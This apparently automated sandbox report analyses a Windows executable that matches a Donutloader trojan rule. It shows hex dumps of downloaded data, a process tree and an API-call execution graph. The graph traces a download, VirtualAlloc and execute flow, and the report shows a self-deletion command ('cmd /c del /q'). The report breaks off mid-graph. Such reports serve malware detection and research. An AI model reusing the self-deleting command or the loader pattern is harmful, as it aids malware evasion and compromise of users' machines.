                                                            2024-07-25 15:10:07 UTC8184INData Raw: 85 c9 74 1e ff 76 10 8b 01 51 ff 50 50 8b 46 08 50 8b 08 ff 51 2c 8b 46 08 50 8b 08 ff 51 08 89 7e 08 8b 4e 10 85 c9 74 09 8b 01 51 ff 50 08 89 7e 10 8b 4e 0c 85 c9 74 09 8b 01 51 ff 50 08 89 7e 0c 8b 4e 04 85 c9 74 09 8b 01 51 ff 50 08 89 7e 04 8b 0e 85 c9 74 08 8b 01 51 ff 50 08 89 3e 5f 5e c3 8b 44 24 04 83 c0 10 f0 ff 00 8b 00 c2 04 00 b8 01 40 00 80 c2 0c 00 b8 01 40 00 80 c2 10 00 8b 44 24 04 ff 74 24 18 ff 74 24 14 8b 40 08 ff 74 24 14 50 8b 08 ff 51 28 c2 18 00 b8 01 40 00 80 c2 14 00 57 8b 7c 24 14 85 ff 75 07 b8 03 40 00 80 eb 16 56 8b 74 24 0c 8b 46 08 50 8b 08 ff 51 04 8b 46 08 89 07 33 c0 5e 5f c2 10 00 8b 44 24 08 85 c0 75 07 b8 03 40 00 80 eb 08 c7 00 01 00 00 00 33 c0 c2 08 00 55 8b ec ff 75 28 8b 45 08 ff 75 24 ff 75 20 8b 48 08 ff 75 1c
                                                            Data Ascii: tvQPPFPQ,FPQ~NtQP~NtQP~NtQP~tQP>_^D$@@D$t$t$@t$PQ(@W|$u@Vt$FPQF3^_D$u@3Uu(Eu$u Hu
                                                            2024-07-25 15:10:07 UTC449INData Raw: e9 9c 00 00 00 e8 ff 00 00 00 8b d0 59 85 f6 75 2b 83 fa 02 75 26 8d 44 24 14 50 e8 e9 00 00 00 8b 54 24 1c 8b f0 59 85 f6 74 76 8b ca 2b cf 8a 01 88 02 42 41 83 ee 01 75 f5 eb 61 8b 4c 24 14 8d 44 24 14 83 f6 01 2b d6 c1 e2 08 0f b6 39 81 c7 00 fe ff ff 03 fa 41 50 89 4c 24 18 e8 a7 00 00 00 59 8b c8 81 ff 00 7d 00 00 72 01 41 8b 54 24 18 8d 41 01 81 ff 00 05 00 00 0f 42 c1 81 ff 80 00 00 00 8d 70 02 0f 43 f0 85 f6 74 13 8b ca 2b cf 8a 01 88 02 42 41 83 ee 01 75 f5 89 54 24 18 33 f6 46 eb 18 8b 4c 24 14 8b 54 24 18 8a 01 88 02 42 41 89 4c 24 14 33 f6 89 54 24 18 85 db 0f 84 9b fe ff ff 5f 5e 2b d5 5d 8b c2 5b 83 c4 14 c3 56 8b 74 24 08 8b 4e 0c 8d 56 08 8d 41 ff 89 46 0c 85 c9 75 13 8b 0e 0f b6 01 89 02 8d 41 01 89 06 c7 46 0c 07 00 00 00 8b 02 5e 8d 0c
                                                            Data Ascii: Yu+u&D$PT$Ytv+BAuaL$D$+9APL$Y}rAT$ABpCt+BAuT$3FL$T$BAL$3T$_^+][Vt$NVAFuAF^


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:11:09:20
                                                            Start date:25/07/2024
                                                            Path:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\LisectAVT_2403002B_185.exe"
                                                            Imagebase:0x5e0000
                                                            File size:328'552 bytes
                                                            MD5 hash:0AAFD40537A281B281BD85EFCB2C976B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000003.2552378256.0000000000D28000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:11:09:20
                                                            Start date:25/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:11:10:14
                                                            Start date:25/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:11:10:14
                                                            Start date:25/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:10.3%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:4.9%
                                                              Total number of Nodes:1157
                                                              Total number of Limit Nodes:14
                                                              execution_graph 20926 5f09ea 20929 5f7531 20926->20929 20930 5f753c RtlFreeHeap 20929->20930 20931 5f0a02 20929->20931 20930->20931 20932 5f7551 GetLastError 20930->20932 20933 5f755e __dosmaperr 20932->20933 20935 5f2009 14 API calls __dosmaperr 20933->20935 20935->20931 20936 5f5e99 20948 5f5e72 20936->20948 20939 5f5eb2 20940 5f5efe 20940->20939 20941 5f5f60 20940->20941 20955 5f8f1e 20940->20955 20967 5f5f8f 20941->20967 20945 5f5f53 20945->20941 20962 5fa592 20945->20962 20949 5f5e7e 20948->20949 20950 5f5e93 20948->20950 20979 5f2009 14 API calls __dosmaperr 20949->20979 20950->20939 20950->20940 20978 5f6061 41 API calls __wsopen_s 20950->20978 20952 5f5e83 20980 5f143d 39 API calls __strnicoll 20952->20980 20956 5f8f2a 20955->20956 20957 5f8f54 20956->20957 20958 5f5e72 _Fgetc 39 API calls 20956->20958 20957->20945 20959 5f8f45 20958->20959 20981 602aa1 20959->20981 20961 5f8f4b 20961->20945 20993 5f8686 20962->20993 20965 5f7531 ___free_lconv_mon 14 API calls 20966 5fa5b9 20965->20966 20966->20941 20968 5f5e72 _Fgetc 39 API calls 20967->20968 20969 5f5f9e 20968->20969 20970 5f6044 20969->20970 20971 5f5fb1 20969->20971 20972 5f7204 __wsopen_s 64 API calls 20970->20972 20973 5f5fce 20971->20973 20976 5f5ff5 20971->20976 20975 5f5f71 20972->20975 21002 5f7204 20973->21002 20976->20975 21013 5fb116 43 API calls _Fputc 20976->21013 20978->20940 20979->20952 20982 602abb 20981->20982 20983 602aae 20981->20983 20986 602ac7 20982->20986 20991 5f2009 14 API calls __dosmaperr 20982->20991 20990 5f2009 14 API calls __dosmaperr 20983->20990 20985 602ab3 20985->20961 20986->20961 20988 602ae8 20992 5f143d 39 API calls __strnicoll 20988->20992 20990->20985 20991->20988 20994 5f8693 _unexpected 20993->20994 20995 5f86be RtlAllocateHeap 20994->20995 20996 5f86d3 20994->20996 21000 5f2d69 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 20994->21000 20995->20994 20998 5f86d1 20995->20998 21001 5f2009 14 API calls __dosmaperr 20996->21001 20998->20965 21000->20994 21001->20998 21003 5f7210 CallCatchBlock 21002->21003 21004 5f7251 21003->21004 21006 5f7297 21003->21006 21012 5f7218 21003->21012 21043 5f13c0 29 API calls 2 library calls 21004->21043 21014 5ffeeb EnterCriticalSection 21006->21014 21008 5f729d 21009 5f72bb 21008->21009 21015 5f7315 21008->21015 21044 5f730d LeaveCriticalSection __wsopen_s 21009->21044 21012->20975 21013->20975 21014->21008 21016 5f733d 21015->21016 21038 5f7360 __wsopen_s 21015->21038 21017 5f7341 21016->21017 21019 5f739c 21016->21019 21059 5f13c0 29 API calls 2 library calls 21017->21059 21020 5f73ba 21019->21020 21060 5fb1b4 21019->21060 21045 5f6e5a 21020->21045 21024 5f7419 21026 5f742d 21024->21026 21027 5f7482 WriteFile 21024->21027 21025 5f73d2 21028 5f73da 21025->21028 21029 5f7401 21025->21029 21032 5f746e 21026->21032 21033 5f7435 21026->21033 21030 5f74a4 GetLastError 21027->21030 21027->21038 21028->21038 21063 5f6df2 6 API calls __wsopen_s 21028->21063 21064 5f6a2b 45 API calls 5 library calls 21029->21064 21030->21038 21052 5f6ed7 21032->21052 21036 5f745a 21033->21036 21037 5f743a 21033->21037 21066 5f709b 8 API calls 3 library calls 21036->21066 21037->21038 21039 5f7443 21037->21039 21038->21009 21065 5f6fb2 7 API calls 2 library calls 21039->21065 21042 5f7414 21042->21038 21043->21012 21044->21012 21046 602aa1 __fread_nolock 39 API calls 21045->21046 21049 5f6e6c 21046->21049 21047 5f6ed0 21047->21024 21047->21025 21048 5f6e9a 21048->21047 21051 5f6eb4 GetConsoleMode 21048->21051 21049->21047 21049->21048 21067 5f0620 39 API calls 2 library calls 21049->21067 21051->21047 21057 5f6ee6 __wsopen_s 21052->21057 21053 5f6f97 21068 5ea256 21053->21068 21055 5f6fb0 21055->21038 21056 5f6f56 WriteFile 21056->21057 21058 5f6f99 GetLastError 21056->21058 21057->21053 21057->21056 21058->21053 21059->21038 21076 5fb093 21060->21076 21062 5fb1cd 21062->21020 21063->21038 21064->21042 21065->21038 21066->21042 21067->21048 21069 5ea25e 21068->21069 21070 5ea25f IsProcessorFeaturePresent 21068->21070 21069->21055 21072 5ea99f 21070->21072 21075 5ea962 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21072->21075 21074 5eaa82 21074->21055 21075->21074 21082 600167 21076->21082 21078 5fb0a5 21079 5fb0c1 SetFilePointerEx 21078->21079 21081 5fb0ad __wsopen_s 21078->21081 21080 5fb0d9 GetLastError 21079->21080 21079->21081 21080->21081 21081->21062 21083 600174 21082->21083 21084 600189 21082->21084 21095 5f1ff6 14 API calls __dosmaperr 21083->21095 21088 6001ae 21084->21088 21097 5f1ff6 14 API calls __dosmaperr 21084->21097 21087 600179 21096 5f2009 14 API calls __dosmaperr 21087->21096 21088->21078 21089 6001b9 21098 5f2009 14 API calls __dosmaperr 21089->21098 21091 600181 21091->21078 21093 6001c1 21099 5f143d 39 API calls __strnicoll 21093->21099 21095->21087 21096->21091 21097->21089 21098->21093 21100 5e9e79 21101 5e9e85 CallCatchBlock 21100->21101 21126 5ea07b 21101->21126 21103 5e9e8c 21104 5e9fe5 21103->21104 21114 5e9eb6 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 21103->21114 21152 5ea517 4 API calls 2 library calls 21104->21152 21106 5e9fec 21153 5f3943 21 API calls std::locale::_Setgloballocale 21106->21153 21108 5e9ff2 21154 5f3907 21 API calls std::locale::_Setgloballocale 21108->21154 21110 5e9ffa 21111 5e9ed5 21112 5e9f56 21137 5f358e 21112->21137 21114->21111 21114->21112 21148 5f391d 39 API calls 4 library calls 21114->21148 21116 5e9f5c 21141 5e35a0 GetConsoleWindow ShowWindow 21116->21141 21127 5ea084 21126->21127 21155 5ea785 IsProcessorFeaturePresent 21127->21155 21129 5ea090 21156 5ec9ae 10 API calls 2 library calls 21129->21156 21131 5ea095 21136 5ea099 21131->21136 21157 5f5632 21131->21157 21134 5ea0b0 21134->21103 21136->21103 21138 5f3597 21137->21138 21139 5f359c 21137->21139 21170 5f32e8 53 API calls 21138->21170 21139->21116 21171 5e2ee0 21141->21171 21148->21112 21152->21106 21153->21108 21154->21110 21155->21129 21156->21131 21161 6024e4 21157->21161 21160 5ec9cd 7 API calls 2 library calls 21160->21136 21162 6024f4 21161->21162 21163 5ea0a2 21161->21163 21162->21163 21165 5f67d0 21162->21165 21163->21134 21163->21160 21166 5f67d7 21165->21166 21167 5f681a GetStdHandle 21166->21167 21168 5f687c 21166->21168 21169 5f682d GetFileType 21166->21169 21167->21166 21168->21162 21169->21166 21170->21139 21255 5e2e50 21171->21255 21174 5e2f0f 21177 5e7990 68 API calls 21174->21177 21175 5e2eef 21259 5e7990 21175->21259 21178 5e2f23 21177->21178 21180 5e4e80 94 API calls 21178->21180 21182 5e2f2d 21180->21182 21276 5e2eb0 40 API calls 3 library calls 21182->21276 21183 5e2f0d Sleep 21185 5e3240 21183->21185 21186 5e3262 __wsopen_s 21185->21186 21483 5e2fd0 CreateDirectoryA 21186->21483 21189 5e329c 21191 5e7990 68 API calls 21189->21191 21190 5e32ba InternetOpenUrlA 21192 5e32dc 21190->21192 21193 5e3304 21190->21193 21195 5e32b0 21191->21195 21196 5e7990 68 API calls 21192->21196 21544 5e4c50 21193->21544 21197 5e4e80 94 API calls 21195->21197 21198 5e32f0 21196->21198 21197->21190 21199 5e4e80 94 API calls 21198->21199 21200 5e32fa InternetCloseHandle 21199->21200 21200->21193 21201 5e3319 21202 5e7990 68 API calls 21201->21202 21208 5e3371 21201->21208 21204 5e334a 21202->21204 21203 5e3378 InternetReadFile 21205 5e33b7 21203->21205 21203->21208 21207 5e7990 68 API calls 21204->21207 21563 5e4b40 21205->21563 21210 5e3353 21207->21210 21208->21203 21208->21205 21554 5e4d50 21208->21554 21213 5e4e80 94 API calls 21210->21213 21214 5e335d InternetCloseHandle InternetCloseHandle 21213->21214 21214->21208 21215 5e342c 21578 5e3820 21215->21578 21216 5e33eb 21216->21215 21217 5e7990 68 API calls 21216->21217 21220 5e3419 21217->21220 21219 5e343b 21583 5e38f0 21219->21583 21222 5e7990 68 API calls 21220->21222 21223 5e3422 21222->21223 21224 5e4e80 94 API calls 21223->21224 21224->21215 21225 5e344c fpos Concurrency::cancellation_token_source::~cancellation_token_source 21593 5e3630 21225->21593 21227 5e3466 fpos 21597 5e3a00 21227->21597 21229 5e3488 21604 5e3670 21229->21604 21231 5e3493 fpos 21232 5e34a2 VirtualAlloc 21231->21232 21233 5e34b4 21232->21233 21237 5e34d2 ctype fpos 21232->21237 21234 5e7990 68 API calls 21233->21234 21235 5e34c8 21234->21235 21236 5e4e80 94 API calls 21235->21236 21236->21237 21238 5e34f9 VirtualFree 21237->21238 21239 5e7990 68 API calls 21238->21239 21240 5e351e 21239->21240 21241 5e4e80 94 API calls 21240->21241 21242 5e3528 21241->21242 21609 5e3610 21242->21609 21246 5e3543 21615 5e2e20 21246->21615 21248 5e3555 Sleep 21249 5e2f40 GetCurrentProcess SetPriorityClass GetCurrentThread SetThreadPriority 21248->21249 22216 5f14c3 21249->22216 21251 5e2f71 SHChangeNotify 21252 5e2f83 21251->21252 22217 5e1170 21252->22217 21277 5eb790 21255->21277 21258 5e2e8a 21258->21174 21258->21175 21261 5e79c2 char_traits 21259->21261 21279 5e5750 21261->21279 21265 5e2f03 21273 5e4e80 21265->21273 21266 5e7a6d 21286 5e6400 21266->21286 21267 5e7b26 21272 5e7b65 char_traits 21267->21272 21283 5e6270 21267->21283 21270 5e85c0 67 API calls 21270->21272 21271 5e7a57 char_traits 21271->21266 21271->21267 21294 5e85c0 21271->21294 21272->21266 21272->21270 21423 5e7ca0 21273->21423 21276->21183 21278 5e2e6c GetVersionExA 21277->21278 21278->21258 21280 5e577a std::ios_base::good 21279->21280 21282 5e5798 std::ios_base::good 21280->21282 21298 5e7140 21280->21298 21282->21271 21306 5e3e30 21283->21306 21284 5e6290 21284->21272 21287 5e6414 std::ios_base::good 21286->21287 21370 5e6430 21287->21370 21290 5e56e0 21291 5e5703 21290->21291 21293 5e572c 21291->21293 21385 5e71e0 40 API calls std::ios_base::good 21291->21385 21293->21265 21295 5e85d1 21294->21295 21296 5e85e5 21295->21296 21386 5e4520 21295->21386 21296->21271 21299 5e7170 21298->21299 21300 5e71cb 21299->21300 21301 5e5750 40 API calls 21299->21301 21300->21282 21304 5e7185 21301->21304 21302 5e71bc 21303 5e56e0 40 API calls 21302->21303 21303->21300 21304->21302 21305 5e6400 40 API calls 21304->21305 21305->21302 21307 5e3e42 21306->21307 21309 5e3e5b std::ios_base::failure::failure 21306->21309 21307->21284 21309->21307 21310 5eeb89 21309->21310 21311 5eeb9c _Fputc 21310->21311 21316 5ee96b 21311->21316 21313 5eebb1 21324 5eddcb 21313->21324 21317 5ee9a1 21316->21317 21318 5ee979 21316->21318 21317->21313 21318->21317 21319 5ee9a8 21318->21319 21320 5ee986 21318->21320 21330 5ee8c4 21319->21330 21338 5f13c0 29 API calls 2 library calls 21320->21338 21325 5eddd7 21324->21325 21326 5eddee 21325->21326 21368 5edf81 39 API calls 2 library calls 21325->21368 21328 5ede01 21326->21328 21369 5edf81 39 API calls 2 library calls 21326->21369 21328->21307 21331 5ee8d0 CallCatchBlock 21330->21331 21339 5ee89c EnterCriticalSection 21331->21339 21333 5ee8de 21340 5ee91f 21333->21340 21337 5ee8fc 21337->21313 21338->21317 21339->21333 21348 5f8f5c 21340->21348 21347 5ee913 LeaveCriticalSection __fread_nolock 21347->21337 21349 5f8f1e 39 API calls 21348->21349 21351 5f8f6d 21349->21351 21350 5ee937 21355 5ee9e2 21350->21355 21351->21350 21352 5f9045 __fread_nolock 15 API calls 21351->21352 21353 5f8fc6 21352->21353 21354 5f7531 ___free_lconv_mon 14 API calls 21353->21354 21354->21350 21358 5ee9f4 21355->21358 21359 5ee955 21355->21359 21356 5eea02 21357 5f13c0 _Fputc 29 API calls 21356->21357 21357->21359 21358->21356 21358->21359 21362 5eea38 _Fputc ctype 21358->21362 21364 5f9007 21359->21364 21360 5ee238 ___scrt_uninitialize_crt 64 API calls 21360->21362 21361 5f5e72 _Fgetc 39 API calls 21361->21362 21362->21359 21362->21360 21362->21361 21363 5f7204 __wsopen_s 64 API calls 21362->21363 21363->21362 21365 5f9012 21364->21365 21366 5ee8eb 21364->21366 21365->21366 21367 5ee238 ___scrt_uninitialize_crt 64 API calls 21365->21367 21366->21347 21367->21366 21368->21326 21369->21328 21371 5e6442 21370->21371 21374 5e26b0 21371->21374 21375 5e273c 21374->21375 21376 5e26d9 21374->21376 21375->21290 21377 5e26ea std::make_error_code 21376->21377 21382 5eb1a3 RaiseException 21376->21382 21383 5e2650 40 API calls std::ios_base::failure::failure 21377->21383 21380 5e272e 21384 5eb1a3 RaiseException 21380->21384 21382->21377 21383->21380 21384->21375 21385->21293 21387 5e4530 char_traits 21386->21387 21388 5e45c1 21387->21388 21389 5e454a char_traits 21387->21389 21390 5e45ff codecvt 21387->21390 21396 5e2ac0 21388->21396 21389->21296 21392 5e4656 21390->21392 21393 5e464e 21390->21393 21392->21389 21394 5eeb89 67 API calls 21392->21394 21393->21389 21395 5e2ac0 _Fputc 41 API calls 21393->21395 21394->21389 21395->21389 21399 5edfcb 21396->21399 21400 5edfde _Fputc 21399->21400 21405 5ede07 21400->21405 21402 5edfed 21403 5eddcb _Fputc 39 API calls 21402->21403 21404 5e2ad2 21403->21404 21404->21389 21406 5ede13 CallCatchBlock 21405->21406 21407 5ede1c 21406->21407 21408 5ede40 21406->21408 21420 5f13c0 29 API calls 2 library calls 21407->21420 21419 5ee89c EnterCriticalSection 21408->21419 21411 5ede49 21412 5f5e72 _Fgetc 39 API calls 21411->21412 21415 5ede5e 21411->21415 21412->21415 21413 5edeca 21421 5f13c0 29 API calls 2 library calls 21413->21421 21414 5edefb _Fputc 21422 5edf33 LeaveCriticalSection __fread_nolock 21414->21422 21415->21413 21415->21414 21418 5ede35 _Fgetc 21418->21402 21419->21411 21420->21418 21421->21418 21422->21418 21430 5e76e0 21423->21430 21425 5e7cb7 21434 5e8630 21425->21434 21428 5e7140 40 API calls 21429 5e4e8e 21428->21429 21429->21183 21431 5e770a std::ios_base::getloc 21430->21431 21443 5e7890 21431->21443 21433 5e7728 std::ios_base::_Ios_base_dtor ctype 21433->21425 21435 5e5750 40 API calls 21434->21435 21436 5e8668 21435->21436 21439 5e85c0 67 API calls 21436->21439 21441 5e867e char_traits 21436->21441 21437 5e6400 40 API calls 21438 5e8727 21437->21438 21440 5e56e0 40 API calls 21438->21440 21439->21441 21442 5e7cc3 21440->21442 21441->21437 21442->21428 21457 5e9023 21443->21457 21447 5e78ce 21448 5e78ec 21447->21448 21476 5e22d0 69 API calls std::_Facet_Register 21447->21476 21469 5e907b 21448->21469 21451 5e7976 21451->21433 21452 5e7901 21453 5e7909 21452->21453 21454 5e7910 21452->21454 21477 5e1b90 RaiseException std::ios_base::clear std::bad_alloc::bad_alloc 21453->21477 21478 5e9391 RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 21454->21478 21458 5e9039 21457->21458 21459 5e9032 21457->21459 21461 5e78b5 21458->21461 21480 5e9a98 EnterCriticalSection 21458->21480 21479 5f1569 6 API calls 2 library calls 21459->21479 21463 5e1e00 21461->21463 21464 5e1e45 21463->21464 21465 5e1e11 21463->21465 21464->21447 21466 5e9023 std::_Lockit::_Lockit 7 API calls 21465->21466 21467 5e1e1b 21466->21467 21468 5e907b std::_Lockit::~_Lockit 2 API calls 21467->21468 21468->21464 21470 5f1577 21469->21470 21471 5e9085 21469->21471 21482 5f1552 LeaveCriticalSection 21470->21482 21475 5e9098 21471->21475 21481 5e9aa6 LeaveCriticalSection 21471->21481 21474 5f157e 21474->21451 21475->21451 21476->21452 21477->21448 21478->21448 21479->21461 21480->21461 21481->21475 21482->21474 21618 5e5280 21483->21618 21485 5e3008 21486 5e5280 std::ios_base::failure::failure 40 API calls 21485->21486 21487 5e301c 21486->21487 21622 5e2cb0 InternetOpenA 21487->21622 21491 5e303c 21492 5e5210 task 39 API calls 21491->21492 21493 5e304b 21492->21493 21494 5e5280 std::ios_base::failure::failure 40 API calls 21493->21494 21495 5e3058 21494->21495 21496 5e5280 std::ios_base::failure::failure 40 API calls 21495->21496 21497 5e306c 21496->21497 21498 5e2cb0 105 API calls 21497->21498 21499 5e307d 21498->21499 21500 5e5210 task 39 API calls 21499->21500 21501 5e308c 21500->21501 21502 5e5210 task 39 API calls 21501->21502 21503 5e309b 21502->21503 21504 5e5280 std::ios_base::failure::failure 40 API calls 21503->21504 21505 5e30ab 21504->21505 21506 5e5280 std::ios_base::failure::failure 40 API calls 21505->21506 21507 5e30c2 21506->21507 21508 5e2cb0 105 API calls 21507->21508 21509 5e30d9 21508->21509 21510 5e5210 task 39 API calls 21509->21510 21511 5e30eb 21510->21511 21512 5e5210 task 39 API calls 21511->21512 21513 5e30fd 21512->21513 21514 5e5280 std::ios_base::failure::failure 40 API calls 21513->21514 21515 5e310d 21514->21515 21516 5e5280 std::ios_base::failure::failure 40 API calls 21515->21516 21517 5e3124 21516->21517 21518 5e2cb0 105 API calls 21517->21518 21519 5e313b 21518->21519 21520 5e5210 task 39 API calls 21519->21520 21521 5e314d 21520->21521 21522 5e5210 task 39 API calls 21521->21522 21523 5e315f 21522->21523 21524 5e5280 std::ios_base::failure::failure 40 API calls 21523->21524 21525 5e316f 21524->21525 21526 5e5280 std::ios_base::failure::failure 40 API calls 21525->21526 21527 5e3186 21526->21527 21528 5e2cb0 105 API calls 21527->21528 21529 5e319d 21528->21529 21530 5e5210 task 39 API calls 21529->21530 21531 5e31af 21530->21531 21532 5e5210 task 39 API calls 21531->21532 21533 5e31c1 21532->21533 21534 5e5280 std::ios_base::failure::failure 40 API calls 21533->21534 21535 5e31d1 21534->21535 21536 5e5280 std::ios_base::failure::failure 40 API calls 21535->21536 21537 5e31e8 21536->21537 21538 5e2cb0 105 API calls 21537->21538 21539 5e31ff 21538->21539 21540 5e5210 task 39 API calls 21539->21540 21541 5e3211 21540->21541 21542 5e5210 task 39 API calls 21541->21542 21543 5e3223 Sleep InternetOpenA 21542->21543 21543->21189 21543->21190 21545 5e4c7b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot std::runtime_error::runtime_error 21544->21545 21735 5e6310 21545->21735 21551 5e4d17 21552 5e4d31 21551->21552 21553 5e6400 40 API calls 21551->21553 21552->21201 21553->21552 21555 5e5750 40 API calls 21554->21555 21558 5e4d88 21555->21558 21556 5e6400 40 API calls 21557 5e4e4e 21556->21557 21559 5e56e0 40 API calls 21557->21559 21561 5e6270 67 API calls 21558->21561 21562 5e4d9e 21558->21562 21560 5e4e63 21559->21560 21560->21208 21561->21562 21562->21556 21942 5e5e60 21563->21942 21566 5e33c2 InternetCloseHandle InternetCloseHandle 21568 5e3720 21566->21568 21567 5e6400 40 API calls 21567->21566 21569 5e374b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot std::runtime_error::runtime_error 21568->21569 21954 5e5ad0 21569->21954 21572 5e5fb0 44 API calls 21573 5e37c9 21572->21573 21574 5e5ed0 98 API calls 21573->21574 21575 5e37e7 21574->21575 21576 5e3801 21575->21576 21577 5e6400 40 API calls 21575->21577 21576->21216 21577->21576 21958 5e5960 21578->21958 21580 5e384c 21581 5e388d 21580->21581 21962 5e62d0 21580->21962 21581->21219 21584 5e3927 std::ios_base::good 21583->21584 21585 5e6430 40 API calls 21584->21585 21586 5e3943 21585->21586 21587 5e5960 69 API calls 21586->21587 21588 5e3951 21587->21588 21589 5e39cb 21588->21589 21590 5e62d0 68 API calls 21588->21590 21589->21225 21591 5e3998 fpos 21590->21591 21591->21589 21592 5e6400 40 API calls 21591->21592 21592->21589 21594 5e364a 21593->21594 22048 5e7d00 21594->22048 21596 5e365a 21596->21227 21598 5e5960 69 API calls 21597->21598 21600 5e3a47 21598->21600 21599 5e6400 40 API calls 21601 5e3b20 21599->21601 21603 5e3aa2 21600->21603 22066 5e62a0 21600->22066 21601->21229 21603->21599 21605 5e5e60 70 API calls 21604->21605 21606 5e3682 21605->21606 21607 5e369c 21606->21607 21608 5e6400 40 API calls 21606->21608 21607->21231 21608->21607 22202 5e5a20 21609->22202 21612 5e3570 22206 5e36c0 21612->22206 21614 5e3582 std::bad_exception::~bad_exception 21614->21246 22213 5e4b90 21615->22213 21617 5e2e32 std::bad_exception::~bad_exception 21617->21248 21619 5e52ab std::ios_base::failure::failure 21618->21619 21646 5e67a0 21619->21646 21621 5e52dd Concurrency::cancellation_token_source::~cancellation_token_source 21621->21485 21623 5e2cee 21622->21623 21624 5e2e08 21622->21624 21655 5e2b40 21623->21655 21643 5e5210 21624->21643 21626 5e2cfb std::runtime_error::runtime_error 21627 5e2d14 InternetOpenUrlA 21626->21627 21628 5e5210 task 39 API calls 21627->21628 21629 5e2d2a 21628->21629 21630 5e2dfe InternetCloseHandle 21629->21630 21631 5e2b40 40 API calls 21629->21631 21630->21624 21632 5e2d41 21631->21632 21665 5e4bf0 21632->21665 21635 5e5210 task 39 API calls 21641 5e2d75 21635->21641 21636 5e2de2 InternetCloseHandle 21637 5e2e20 70 API calls 21636->21637 21637->21630 21638 5e2d98 InternetReadFile 21639 5e2dd7 21638->21639 21638->21641 21640 5e4b40 71 API calls 21639->21640 21640->21636 21641->21636 21641->21638 21641->21639 21642 5e4d50 68 API calls 21641->21642 21642->21641 21731 5e6630 21643->21731 21645 5e521f task 21645->21491 21647 5e67b0 std::runtime_error::runtime_error char_traits 21646->21647 21650 5e67d0 21647->21650 21649 5e67c9 21649->21621 21651 5e6828 21650->21651 21653 5e67e4 std::ios_base::failure::failure task std::runtime_error::runtime_error 21650->21653 21654 5e80d0 40 API calls 4 library calls 21651->21654 21653->21649 21654->21653 21656 5e2b6b Concurrency::cancellation_token_source::~cancellation_token_source 21655->21656 21669 5e4f40 21656->21669 21658 5e2b93 std::runtime_error::runtime_error 21659 5e2c20 std::ios_base::failure::failure 21658->21659 21673 5e50a0 21658->21673 21677 5e4f20 21659->21677 21662 5e5210 task 39 API calls 21663 5e2c97 21662->21663 21663->21626 21666 5e4c0b std::runtime_error::runtime_error 21665->21666 21667 5e4c50 100 API calls 21666->21667 21668 5e2d69 21667->21668 21668->21635 21670 5e4f5a 21669->21670 21680 5e7eb0 21670->21680 21672 5e4f6a 21672->21658 21674 5e5104 21673->21674 21676 5e50bd task std::runtime_error::runtime_error 21673->21676 21688 5e7f60 21674->21688 21676->21658 21726 5e6470 21677->21726 21681 5e7eeb std::ios_base::failure::failure 21680->21681 21682 5e7f3c Concurrency::cancellation_token_source::~cancellation_token_source 21681->21682 21686 5e8780 40 API calls 21681->21686 21682->21672 21684 5e7efd 21687 5e83b0 39 API calls Concurrency::cancellation_token_source::~cancellation_token_source 21684->21687 21686->21684 21687->21682 21689 5e7f80 std::ios_base::failure::failure 21688->21689 21691 5e7f8d std::ios_base::failure::failure Concurrency::cancellation_token_source::~cancellation_token_source 21689->21691 21700 5e1550 40 API calls std::_Xinvalid_argument 21689->21700 21696 5e7540 21691->21696 21693 5e7fc8 Concurrency::cancellation_token_source::~cancellation_token_source std::runtime_error::runtime_error 21695 5e8037 std::ios_base::failure::failure 21693->21695 21701 5e7570 21693->21701 21695->21676 21697 5e7550 allocator 21696->21697 21704 5e8370 21697->21704 21700->21691 21721 5e8300 21701->21721 21703 5e7584 21703->21695 21705 5e837c 21704->21705 21708 5e838a 21704->21708 21710 5e8b30 21705->21710 21707 5e7559 21707->21693 21708->21707 21718 5e1490 21708->21718 21711 5e8b4c 21710->21711 21712 5e8b47 21710->21712 21714 5e1490 _Allocate RaiseException EnterCriticalSection LeaveCriticalSection 21711->21714 21713 5e1400 Concurrency::cancel_current_task RaiseException 